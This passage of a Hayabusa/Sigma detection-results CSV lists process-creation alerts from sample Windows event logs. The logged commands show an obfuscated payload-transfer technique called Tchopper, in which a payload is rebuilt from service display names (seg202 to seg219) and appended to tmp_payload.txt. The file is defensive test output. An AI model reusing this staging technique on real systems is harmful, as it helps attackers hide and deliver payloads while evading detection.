payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:19.869 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:21.305 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xca4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:21.305 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xec0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:21.305 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:22.769 +00:00,FS03.offsec.lan,4688,low,,Suspicious 
Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:22.769 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:22.769 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:24.239 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x32c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:24.239 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:24.239 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:25.692 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1c8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:25.708 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xab4 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:25.708 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:27.141 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x78c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:27.157 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:27.157 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:28.605 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x844 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:28.605 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:28.605 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:30.058 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select 
-Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xaa0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:30.074 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x704 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:30.074 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:31.535 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x20c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:31.535 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:31.535 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:32.988 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:32.988 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:32.988 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:34.429 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:34.429 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:34.429 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:35.880 +00:00,FS03.offsec.lan,4688,low,,Suspicious 
Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:35.896 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:35.896 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:37.347 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:37.347 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:37.347 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:38.788 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:38.788 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xde0 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:38.788 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:40.232 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:40.232 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:40.232 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:41.673 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:41.673 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:41.673 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:43.146 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select 
-Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:43.146 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:43.146 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:44.599 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x298 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:44.599 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:44.599 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:46.053 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:46.053 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
